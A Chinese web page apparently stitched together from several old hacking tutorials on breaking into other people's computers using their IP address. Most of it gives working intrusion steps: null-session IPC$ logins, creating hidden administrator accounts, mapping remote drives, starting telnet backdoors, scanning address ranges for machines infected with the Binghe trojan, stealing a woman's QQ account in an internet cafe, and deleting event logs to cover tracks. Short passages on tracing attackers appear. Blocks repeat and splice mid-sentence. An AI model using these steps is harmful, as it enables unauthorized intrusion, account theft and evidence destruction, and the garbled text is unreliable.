知道对方IP入侵别人的电脑(最简单方法)

如何成功入侵局域网电脑我们在入侵的时候难免遇到忘记一些小步骤和小命令的时候。

下面是店铺跟大家分享的是如何成功入侵局域网电脑，欢迎大家来阅读学习。

如何成功入侵局域网电脑入侵局域网电脑方法一1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可迚入。

入侵局域网电脑方法二1、下载必备的工具软件。

1号软件就是端口扫描工具“网络刺客II”，2号软件就是著名的国产木马冰河2.2的控制端。

下载完毕并解压缩之后跟我迚行第二步!2、运行1号软件，首先出现的是“网络刺客II注册向导”，别理它，点击“稍后(Q)”就迚入了网络刺客II的主界面。

第三步在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”，就迚入了“搜索因特网主机”界面。

第四步迚入“搜索因特网主机”界面后，“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了，比如你可以选61.128或选61.200等等，“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。

“端口”栏填7626，其他栏保持默认不动。

好了，以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了，再检查一下填对没有?如果一切OK，请点击“开始搜索”。

1、就算您知道了对方IP也没有用的，因为IP只代表网络地址。

你想想，如果一个人在上海申请了一个地址但是如果他把电脑带到了北京，那个IP仍然可以用，但还是那个人用的吗？而且有很多ip不是固定的，除非您能确认您想要攻击的机器，否则，是没有用处的。

2、但靠一个IP是很难攻击别人的，除非您是顶尖的黑客！其次呢攻击对方要在别人没有防范，也就是没装防火墙的情况下，如果对方装了杀毒软件和防火墙的话，那希望又是很渺茫的啦！3、如果实在想攻击试试，尝试一下黑客的感觉，或者想窥探一下别人的秘密，软件您可以试试远程控制任我行，其他您可以参考以下：方法一：(此法适用于远程入侵）用流光扫描破解版扫描该IP所存在的端口漏洞，然后用阿D注入工具或鸽子或远程控制任我行（反正只要是能进行反向连接的软件）从后门进入他的电脑！流光扫描破解版下载地址：（自己去找一个下载）阿D注入工具包下载地址：（自己去找一个下载）灰鸽子下载地址：（自己去找一个下载）知道了端口更方便的知道它开了什么服务~想攻击的话得利用主机的漏洞才行~你攻击的肯定不是像我这样的机器所以光知道这些是不行的我给你遗篇文章你看看※黑客攻防指南※===>黑客入门==>windows的入侵与攻略(适合菜鸟）windows的入侵与攻略(适合菜鸟）第一段：Ο行动之前我们推荐你现在文件夹选项中设置显示所有的文件夹与文件，这样可以将所有找到的文件夹与文件都显示出来，而不会有漏网之鱼。

▼入侵WINDOWS流程一开始入侵操作有关WINDOWS NETBIOS端口139的扫描工具很多，但在经过我们的精挑细选，严格考验之后，发现将ANGRY IP SCANNER与NETBRUTE SCANNER来搭配使用会有最快最加的效果，所以这里就以他们来进行操作说明，请依照下面的步骤来进行。

⑴已经有特定对象的IP地址或已有特定范围的IP地址。

⑵不是通过公司或单位的仿真IP连接到INTERNET。

教你如何侵入别人的电脑.txt“恋”是个很强悍的字。

它的上半部取自“变态”的“变”，下半部取自“变态”的“态”。

1、取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入黑客命令之1：NET只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！这里我们假如你得到的用户是hbx，密码是123456。

假设对方IP为127.0.0.1net use \\127.0.0.1\ipc$ "123456" /user:"hbx"退出的命令是net use \\127.0.0.1\ipc$ /delte下面的*作你必须登陆后才可以用.登陆的方法就在上面.----------------------下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户.我们加一个heibai的用户密码为lovechinanet user heibai lovechina /add只要显示命令成功,那么我们可以把他加入Administrator组了.net localgroup Administrators heibai /add----------------------这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.net use z:\\127.0.0.1\c$----------------------net start telnet这样可以打开对方的TELNET服务.----------------------这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。

黑客技术之知道对方IP入侵别人电脑黑客文章并非原创实在找不到文章的来源了，所以就不把原创作者给发上来了，希望作者谅解。

与远程主机建立空管连接 net use \IP地址ipc$ "" /use:""以管理员身份登录远程主机 net use \IP地址ipc$ "密码"/use:"Administrator"传送文件到远程主机WINNT目录下copy 本机目录路径程序\IP 地址admin$ 查看远程主机时间 net time \IP地址定时启动某个程序 at \IP地址 02:18 readme.exe查看共享 net view \IP地址查看netbios工作组列表 nBTstat -A IP地址将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator"这两条把自己增加到管理员组： net user 用户名密码 /addnet locaLGroup Administrators 用户名 /add断开连接 net use \IP地址ipc$ /delete扫尾：del C:winntsystem32logfiles*.*del C:winntssytem32config*.evtdel C:winntsystem32dTCLog*.*del C:winntsystem32*.logdel C:winntsystem32*.txtdel C:winnt*.txtdel C:winnt*.log一、netsvc.exe下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务：netsvc /list \IP地址netsvc schedule \IP地址 /querynetsvc \IP地址 schedule /start二、OpenTelnet.exe远程启动主机的T elnet服务，并绑定端口到7878，例如：OpenTelnet \IP地址用户名密码 1 7878然后就可以telnet到主机的7878端口，进入DOS方式下：telnet IP地址 7878三、winshell.exe一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码winshell，当看到CMD>后，可打下面的命令：p Path （查看winshell主程序的路径信息）b reBoot （重新启动机器）d shutDown （关闭机器）s Shell （执行后你就会看到可爱的“C:>”）x eXit （退出本次登录会话，此命令并不终止winshell的运行）CMD> http://.../srv.exe （通过http下载其他网站上的文件到运行winshell的机器上）四、3389登陆器，GUI方式登录远程主机的五、elsave.exe事件日志清除工具elsave -s \IP地址 -l "application" -Celsave -s \IP地址 -l "system" -Celsave -s \IP地址 -l "security" -C执行后成功清除应用程序日志，系统日志，安全日志六、hbulot.exe开启win2kserver和winxp的3389服务hbulot （/r）七、nc.exe(netcat.exe)一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。

个人主机入侵网络攻击知道对方IP该怎么入侵最新教学，有人问技术有展示吗？我怎么知道你是不是骗我的呢？既然知道我是骗你的，为什么还要学习呢？为什么非要我说一句：是真的，不骗你。

你们才肯相信呢？不相信可以不和我联系，或者直接拉黑我，不要和我废话，多说也无益，为什么还要和我说呢？教学可以公开一些，无所谓，最重要是你们真学，想学，肯学，那才重要！不付出那怎么有回报呢，难道天下的饭店我们都可以随便吃喝吗？个人主机入侵网络攻击的步骤第一步：隐藏自已的位置为了不在目的主机上留下自己的IP地址，防止被目的主机发现，老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。

所谓“肉鸡”通常是指，HACK实现通过后门程序控制的傀儡主机，通过“肉鸡”开展的扫描及攻击，即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。

第二步：寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。

在Internet上能真正标识主机的是IP地址，域名是为了便于记忆主机的IP 地址而另起的名字，只要利用域名和IP地址就可以顺利地找到目标主机。

当然，知道了要攻击目标的位置还是远远不够的，还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。

此时，攻击者们会使用一些扫描器工具，以试图获取目标主机运行的是哪种操作系统的哪个版本，系统有哪些帐户，开启了哪些服务，以及服务程序的版本等资料，为入侵作好充分的准备。

第三步：获取帐号和密码，登录主机攻击者要想入侵一台主机，首先要有该主机的一个帐号和密码，否则连登录都无法进行。

这样常迫使他们先设法盗窃帐户文件，进行破解，从中获取某用户的帐户和口令，再寻觅合适时机以此身份进入主机。

当然，利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。

第四步：获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后，就会做两件事：清除记录和留下后门。

他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序，以便日后可以不被觉察地再次进入系统。

网吧内如何入侵别人电脑大家都知道网吧经常都是病毒来源的“常客”，下面让小编带大家了解一下这些所谓的“常客”是如何来的?现在网吧管理软件有很多，但大多有这样或那样的漏洞，于是就出现了很多解除网吧软件和网吧软件解除技巧，可以免费上网，可以使用“命令提示符”方式，可以使用管理员权限等等。

于是网吧也成了虚拟财产丢失最严重的地方。

但只要网吧管理员的水平足够还是能够避免这种情况发生的。

告诉你我以前还在网吧是如何得到MMQQ 号的技巧吧，有点复杂，主要是让你了解一些黑客入侵时所用到的命令。

第一步:先要确定MM所用电脑的IP，网吧电脑的编号和IP地址通常是相同或是高一位，比如网吧中编号为20的电脑，IP一般是192.168.0.20或192.168.0.21(192.168.0.1留给路由器)，不仅如此，机器名也有规律，20号电脑的机器名通常是Wangba20，这样只要知道了MM用的电脑，再进入到“命令提示符”，Ping Wangba20就可以得到IP地址，比如192.168.0.20。

第二步:有了IP，就可以开始连接上MM的电脑了，由于网吧内的电脑多使用没有打过补丁的Windows 2000，而且登录电脑的用户名也多是“user编号”的形式空密码形式，所以在“命令提示符”下输入net use //192.168.0.20/ipc$ "" /user:""及net use //192.168.0.20/ipc$ "" /user:"user20"命令建立连接。

连接成功后，就要关闭对方电脑中的杀毒软件了，右击“我的电脑”，选择“管理”，在弹出窗口中右击“计算机管理(本地)”，选择“连接到另一台计算机”，连接至192.168.0.20，启动“Telnet”服务(见图1)(图1 “计算机管理”可以直接管理远程电脑)。

第三步:在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。

网络侵入事件是指未经授权者通过网络渗透到系统中获取敏感信息、破坏系统安全等行为。

随着互联网的普及和信息安全意识的提升，网络侵入事件已经成为当今社会一个不容忽视的问题。

而追踪追查网络侵入事件是关键的一步，下面将介绍如何通过网络追踪追查网络侵入事件。

1.收集证据在发现网络侵入事件后，首先要做的是收集相关的证据。

这些证据可以包括异常文件、异常网络流量、日志记录等。

通过对这些证据的分析，可以确定被入侵的系统、入侵的时间、攻击方式等重要信息。

2.分析攻击痕迹在收集完相关证据后，接下来要做的是对攻击痕迹进行分析。

通过分析攻击痕迹，可以判断入侵者的攻击手段和目的。

常见的攻击痕迹包括入侵者留下的异常日志、病毒代码等。

通过对这些攻击痕迹的分析，可以进一步了解入侵者的攻击技术和手法，为后续的追踪和追查提供重要线索。

3.网络追踪网络追踪是指通过追踪网络流量来确定入侵者的真实身份和位置。

追踪网络流量需要借助专业的网络追踪工具和技术。

一般来说，可以先通过查看日志记录、IP地址、MAC地址等信息来确定入侵者的基本信息，再通过跟踪网络流量的路径和行为来进一步确定入侵者的位置。

4.合作与协作在追踪追查网络侵入事件的过程中，合作与协作是非常重要的。

一方面，可以与安全厂商、网络安全专家等专业人士进行合作，借助他们的专业知识和技术来进行追踪和追查；另一方面，还可以与其他受害者或相关组织进行协作，共同汇集线索，提高追踪追查的效率和精度。

5.法律途径追踪追查网络侵入事件的最终目的是为了将入侵者绳之以法。

在国内外，网络侵入行为已经被明确列为违法行为，并对此进行了相应的法律规范。

所以，在追踪追查的过程中，可以积极联系相关部门，提供追踪追查的结果和相关证据，协助他们追诉入侵者。

6.防范与预防追踪追查网络侵入事件只是解决问题的一部分，更重要的是要做好防范与预防工作。

在网络安全方面，防范和预防远比追踪追查更为重要，可以通过加强网络安全意识、定期更新系统补丁、部署防火墙等措施来提高系统的安全性。

黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。

其实黑客的最高境界在于防守，不在于进攻。

所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。

现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法:4.在Windows目录（system32\drives\etc）5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。

对付上面进攻的最好办法就是隐藏你的IP地址。

MultiProxy是利用HTTP代理隐藏IP。

方法是打开IE浏览器，在地址栏中输[Ctrl+Shift+F8]组合键，把所有代理IP以外的内容删除后，再用“替换”功能修改成形如×××.×××.×××.×××:port格式。

操作很简单，把IP与端口号之间的两个空格替换成“：”就可以了。

修改完成后，将文件保存成TXT文件。

接下来启动MultiProxy程序，点击主界面的[选项]按钮，在“常规选择”页中把“缺省超时”的时间设长些如“30”，其他设置保持不变。

切换到“代理服务器列表”页面，按右下角的[菜单]→[文件]→[导入代理列表]命令，将刚才保存的代理IP文件打开，此时会弹出一个“检查代理”对话框，按[确定]，再按一次[确定]返回程序主界面。

如果刚才选择的代理IP文件不能导入到列表中，可能文件中存在不符合格式的IP，将它们修改正确，保存后重新导入即可。

现在点击[检查所有的代理]按钮，验证IP是否可连接。

检验完毕后，再次单击[选项]按钮，切换到“代理服务器列表”页，点击左下角的[菜单]→[代理表]→[删除没有应答的代理]命令，接着会询问“是否肯定删除所有没有应答的代理”，单击[确定]，把没有应答的代理IP删除后，剩下的就是可连接的代理IP了（如图2），单击[确定]按钮返回到程序主界面。

1、就算您知道了对方IP也没有用的，因为IP只代表网络地址。

你想想，如果一个人在上海申请了一个地址但是如果他把电脑带到了北京，那个IP仍然可以用，但还是那个人用的吗？而且有很多ip不是固定的，除非您能确认您想要攻击的机器，否则，是没有用处的。

2、但靠一个IP是很难攻击别人的，除非您是顶尖的黑客！其次呢攻击对方要在别人没有防范，也就是没装防火墙的情况下，如果对方装了杀毒软件和防火墙的话，那希望又是很渺茫的啦！3、如果实在想攻击试试，尝试一下黑客的感觉，或者想窥探一下别人的秘密，软件您可以试试远程控制任我行，其他您可以参考以下：方法一：(此法适用于远程入侵）用流光扫描破解版扫描该IP所存在的端口漏洞，然后用阿D注入工具或鸽子或远程控制任我行（反正只要是能进行反向连接的软件）从后门进入他的电脑！流光扫描破解版下载地址：（自己去找一个下载）阿D注入工具包下载地址：（自己去找一个下载）灰鸽子下载地址：（自己去找一个下载）知道了端口更方便的知道它开了什么服务~想攻击的话得利用主机的漏洞才行~你攻击的肯定不是像我这样的机器所以光知道这些是不行的我给你遗篇文章你看看※黑客攻防指南※===>黑客入门==>windows的入侵与攻略(适合菜鸟）windows的入侵与攻略(适合菜鸟）第一段：Ο行动之前我们推荐你现在文件夹选项中设置显示所有的文件夹与文件，这样可以将所有找到的文件夹与文件都显示出来，而不会有漏网之鱼。

▼入侵WINDOWS流程一开始入侵操作有关WINDOWS NETBIOS端口139的扫描工具很多，但在经过我们的精挑细选，严格考验之后，发现将ANGRY IP SCANNER与NETBRUTE SCANNER来搭配使用会有最快最加的效果，所以这里就以他们来进行操作说明，请依照下面的步骤来进行。

⑴已经有特定对象的IP地址或已有特定范围的IP地址。

⑵不是通过公司或单位的仿真IP连接到INTERNET。

入侵别人的电脑最简单方法GE GROUP system office room 【GEIHUA16H-GEIHUA GEIHUA8Q8-黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。

其实黑客的最高境界在于防守，不在于进攻。

所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。

现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法:1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在Windows目录（system32\drives\etc）下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件：XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。

对付上面进攻的最好办法就是隐藏你的IP地址。

MultiProxy是利用HTTP代理隐藏IP。

方法是打开IE浏览器，在地址栏中输http: ///page1.html，虽然全是英文可能有些看不懂，没关系，只要将那些代理IP复制到Word中，按下[Ctrl+Shift+F8]组合键，把所有代理IP以外的内容删除后，再用“替换”功能修改成形如×××.×××.×××.×××:port格式。

一、查QQ用户IP地址即可以看到你的IP地址1.通过FolkOicq查IPFolkOicq是个能给QQ添加IP显示补丁的程序，最新版本FolkQQ0530SE_B2。

下载后得到一个Zip的压缩包，用Winzip解压出文件QQ2000.EXE，将它复制到QQ的安装目录下（在这之前最好是备份一下原来的QQ2000.exe，防止以后出错不能恢复）。

然后运行QQ2000，点一个在线用户，你会发现在QQ号下面有IP地址了。

看到00.000.000.00了吗？对！这就是对方的IP地址。

2.通过IpSniper查IPIpSniper是针对QQ2000的IP地址查询工具。

它支持目前OQ2000所有的版本，在Win98和Win2000操作系统下都可正常工作。

当你第一次运行IpSniper程序时，会弹出一个对话框，要求你在“设置”中设置好各个参数。

点击“设置”，指定QQ执行文件所在的目录以及文件名，点击“确定”即可。

下次运行IpSniper，就会直接启动QQ主程序。

当你与好友或者陌生人通话的同时，IpSniper 会实时的截获通话者的Ip地址、端口号以及对方的QQ号码，并把对方所在地的地理位置一并显示出来3.通过防火墙查IP由于QQ使用的是UDP协议来传送信息的，而UDP是面向无连接的协议，QQ为了保证信息到达对方，需要对方发一个认证，告诉本机，对方已经收到消息，防火墙(例如天网)则带有UDP监听的功能，因此我们就可以利用这个认证来查看IP，哈哈，得来全不费功夫！现在让我们举一个实际的例子来看看如何用天网查IP。

第一步：打开天网防火墙的UDP监听第二步：向他(她)发送一个消息；第三步：查看自己所用的QQ服务器地址第四步：排除QQ服务器地址，判断出对方的IP地址，怎么样，他(她)跑不掉了吧？闲太麻烦？要知道腾迅的QQ升级速度比火箭都快，用前两个办法总是有版本限制的，用这个方法可是一劳永逸啊！NetXRay是由Cinco Networks公司开发的一个用于高级分组检错的软件，功能很强大。

黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。

其实黑客的最高境界在于防守，不在于进攻。

所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。

现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法:115.48.97.2211.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件：XX.XX.XX.XX 电脑名5.开DOS窗口键入NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。

对付上面进攻的最好办法就是隐藏你的IP地址。

MultiProxy是利用HTTP代理隐藏IP。

方法是打开IE浏览器，在地址栏中输http:///page1.html，虽然全是英文可能有些看不懂，没关系，只要将那些代理IP复制到Word中，按下[Ctrl+Shift+F8]组合键，把所有代理IP以外的内容删除后，再用“替换”功能修改成形如×××.×××.×××.×××:port格式。

操作很简单，把IP与端口号之间的两个空格替换成“：”就可以了。

修改完成后，将文件保存成TXT文件。

简单4招教你轻松追踪到黑客老巢网络安全是一个综合的、复杂的工程，任何网络安全措施都不能保证万无一失。

因此，对于一些重要的部门，一旦网络遭到攻击，如何追踪网络攻击，追查到攻击者并将其绳之以法，是十分必要的。

追踪网络攻击就是找到事件发生的源头。

它有两个方面意义：一是指发现IP地址、MAC 地址或是认证的主机名；二是指确定攻击者的身份。

网络攻击者在实施攻击之时或之后，必然会留下一些蛛丝马迹，如登录的纪录，文件权限的改变等虚拟证据，如何正确处理虚拟证据是追踪网络攻击的最大挑战。

在追踪网络攻击中另一需要考虑的问题是：IP地址是一个虚拟地址而不是一个物理地址，IP地址很容易被伪造，大部分网络攻击者采用IP地址欺骗技术。

这样追踪到的攻击源是不正确的。

使得以IP地址为基础去发现攻击者变得更加困难。

因此，必须采用一些方法，识破攻击者的欺骗，找到攻击源的真正IP地址。

一、netstat命令——实时察看文击者使用netstat命令可以获得所有联接被测主机的网络用户的IP地址。

Windows系列、Unix 系列、Linux等常用网络操作系统都可以使用“netstat”命令。

使用“netstat”命令的缺点是只能显示当前的连接，如果使用“netstat”命令时攻击者没有联接，则无法发现攻击者的踪迹。

为此，可以使用Scheduler建立一个日程安排，安排系统每隔一定的时间使用一次“netstat”命令，并使用netstat〉〉textfile格式把每次检查时得到的数据写入一个文本文件中，以便需要追踪网络攻击时使用。

二、日志数据——最详细的攻击记录系统的日志数据提供了详细的用户登录信息。

在追踪网络攻击时，这些数据是最直接的、有效的证据。

但是有些系统的日志数据不完善，网络攻击者也常会把自己的活动从系统日志中删除。

因此，需要采取补救措施，以保证日志数据的完整性。

Unix和Linux的日志Unix和Linux的日志文件较详细的记录了用户的各种活动，如登录的ID的用户名、用户IP地址、端口号、登录和退出时间、每个ID最近一次登录时间、登录的终端、执行的命令，用户ID的账号信息等。

如何通过ip进入对方电脑黑客 2010-03-05 20:53:07 阅读526 评论0 字号：大中小注意这种方法本人未用过，请大家试试！在局域网里:点击开始，接着点击运行，在出现的对话框内输入：\\xxx.xxx.xxx.xxx\D$ （这里前面的xxx表示IP 地址，也就是局域网内某台电脑的地址，后面的D指的是盘符，也就是C盘或D盘呀什么的，如果再要进入下一个已知的文件夹，还可加一左斜线后面写上文件夹的名字就可以进入了，初次进入可能要输入用户名和密码。

如果没有经过怎么设置，你可以用administrator这个用户名进去。

但是如果人家设置了较难的密码就可能不好进了在互联网里：使用IDQ。

EXE，IISMiscOverflowV2_Build0016.exe,nc.exe三个软件可以轻松入侵对方的SYSTEM。

小心这一个IP：60.25.146.19第一步下载必备的工具软件。

1号软件就是端口扫描工具“网络刺客II”，2号软件就是著名的国产木马冰河2.2的控制端。

下载完毕并解压缩之后跟我进行第二步！第二步运行1号软件，首先出现的是“网络刺客II注册向导”，别理它，点击“稍后(Q)”就进入了网络刺客II的主界面。

第三步在网络刺客II的主界面里选“工具箱（U）”-》“主机查找器（H）”，就进入了“搜索因特网主机”界面。

第四步进入“搜索因特网主机”界面后，“起始地址”栏填***.***.0.0其中***.***自己去选择了，比如你可以选61.128或选61.200等等，“结束地址”栏填***.***.255.255其中***.***的选择要和前面一样。

“端口”栏填7626，其他栏保持默认不动。

好了，以上设置就是要搜索从***.***.0.0到***.***.255.255这一段IP地址中有冰河木马的计算机了，再检查一下填对没有？如果一切OK，请点击“开始搜索”。

第五步观察“总进度”和“段进度”是否在走动。